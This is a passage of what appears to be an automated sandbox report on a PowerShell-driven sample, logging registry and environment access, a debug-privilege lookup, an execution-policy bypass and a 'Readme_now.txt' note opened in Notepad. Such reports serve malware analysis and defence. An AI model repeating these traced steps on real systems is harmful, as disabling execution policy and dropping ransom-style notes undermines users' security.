1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time\Dynamic DST | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
84 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
9 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\EventLog\ProtectedEventLogging | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\.NETFramework\XML | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\XML | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | - |
|
4 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time | value_name = TZI, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time\Dynamic DST | value_name = FirstEntry, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time\Dynamic DST | value_name = FirstEntry, data = 2007, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time\Dynamic DST | value_name = LastEntry, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time\Dynamic DST | value_name = LastEntry, data = 2008, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time\Dynamic DST | value_name = 2007, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time\Dynamic DST | value_name = 2008, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time | value_name = MUI_Display, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time | value_name = MUI_Display, data = @tzres.dll,-670, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time | value_name = MUI_Std, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time | value_name = MUI_Std, data = @tzres.dll,-672, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time | value_name = MUI_Dlt, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time | value_name = MUI_Dlt, data = @tzres.dll,-671, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Environment | value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
84 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
4 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
4 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
4 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
4 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
4 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
4 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
4 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
3 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
3 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
3 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
3 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
3 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
3 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
3 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
3 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
3 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\Readme_now.txt | show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | C:\Windows\system32\en-US\tzres.dll.mui | base_address = 0x9400001 |
|
3 | |
| Get Filename | - | process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
2 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
System (1385)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 0 milliseconds (0.000 seconds) |
|
1143 | |
| Sleep | duration = 5 milliseconds (0.005 seconds) |
|
1 | |
| Sleep | duration = -1 (infinite) |
|
2 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
3 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
118 | |
| Get Info | type = Hardware Information |
|
118 |
Mutex (10)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-1462094071-1423818996-289466292-1000 |
|
1 | |
| Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-1462094071-1423818996-289466292-1000 |
|
1 | |
| Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-1462094071-1423818996-289466292-1000 |
|
1 | |
| Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-1462094071-1423818996-289466292-1000 |
|
1 | |
| Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-1462094071-1423818996-289466292-1000 |
|
1 | |
| Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-1462094071-1423818996-289466292-1000 |
|
1 | |
| Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-1462094071-1423818996-289466292-1000 |
|
1 | |
| Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-1462094071-1423818996-289466292-1000 |
|
1 | |
| Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-1462094071-1423818996-289466292-1000 |
|
1 | |
| Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-1462094071-1423818996-289466292-1000 |
|
1 |
Environment (1469)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = MshEnableTrace |
|
33 | |
| Get Environment String | name = PSModulePath, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Get Environment String | name = PinnableBufferCache_System.Threading.OverlappedData_Disabled |
|
1 | |
| Get Environment String | name = PinnableBufferCache_System.Threading.OverlappedData_MinCount |
|
1 | |
| Get Environment String | name = PathEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Get Environment String | name = USERPROFILE, result_out = C:\Users\CIiHmnxMn6Ps |
|
2 | |
| Get Environment String | name = PSModuleAutoLoadingPreference |
|
1397 | |
| Get Environment String | name = PSExecutionPolicyPreference, result_out = Bypass |
|
2 | |
| Get Environment String | name = PSMODULEPATH, result_out = C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
7 | |
| Get Environment String | name = PSDisableModuleAutoloadingCacheMaintenance |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
3 | |
| Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
10 | |
| Set Environment String | name = PSExecutionPolicyPreference, value = Bypass |
|
1 | |
| Set Environment String | name = PathEXT, value = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL |
|
1 | |
| Set Environment String | name = PSMODULEPATH, value = C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 |
Process #8: notepad.exe
0
0
| Information | Value |
|---|---|
| ID | #8 |
| File Name | c:\windows\syswow64\notepad.exe |
| Command Line | "C:\Windows\system32\NOTEPAD.EXE" C:\Users\CIiHmnxMn6Ps\Desktop\Readme_now.txt |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:23, Reason: Child Process |
| Unmonitor | End Time: 00:04:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:03:12 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xf30 |
| Parent PID | 0xcc8 (c:\windows\syswow64\windowspowershell\v1.0\powershell.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
F34
0x
F38
0x
F3C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000e70000 | 0x00e70000 | 0x00e8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000e70000 | 0x00e70000 | 0x00e7ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000e80000 | 0x00e80000 | 0x00e83fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e90000 | 0x00e90000 | 0x00e91fff | Private Memory | rw |
|
|
|
- |
| notepad.exe.mui | 0x00e90000 | 0x00e92fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000ea0000 | 0x00ea0000 | 0x00eb3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000ec0000 | 0x00ec0000 | 0x00efffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f00000 | 0x00f00000 | 0x00f3ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000f40000 | 0x00f40000 | 0x00f43fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000f50000 | 0x00f50000 | 0x00f52fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000f60000 | 0x00f60000 | 0x00f61fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f70000 | 0x00f70000 | 0x00f70fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f80000 | 0x00f80000 | 0x00f80fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f90000 | 0x00f90000 | 0x00f9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000fa0000 | 0x00fa0000 | 0x00fdffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000fe0000 | 0x00fe0000 | 0x00fe3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000ff0000 | 0x00ff0000 | 0x00ff1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001000000 | 0x01000000 | 0x010fffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x01100000 | 0x011bdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000011c0000 | 0x011c0000 | 0x011fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x0123ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001240000 | 0x01240000 | 0x0127ffff | Private Memory | rw |
|
|
|
- |
| notepad.exe | 0x01300000 | 0x01337fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001340000 | 0x01340000 | 0x0533ffff | Pagefile Backed Memory | - |
|
|
|
- |
| comctl32.dll | 0x05340000 | 0x05548fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000055d0000 | 0x055d0000 | 0x055dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005670000 | 0x05670000 | 0x0567ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000005680000 | 0x05680000 | 0x05807fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005810000 | 0x05810000 | 0x05990fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000059a0000 | 0x059a0000 | 0x06d9ffff | Pagefile Backed Memory | r |
|
|
|
- |
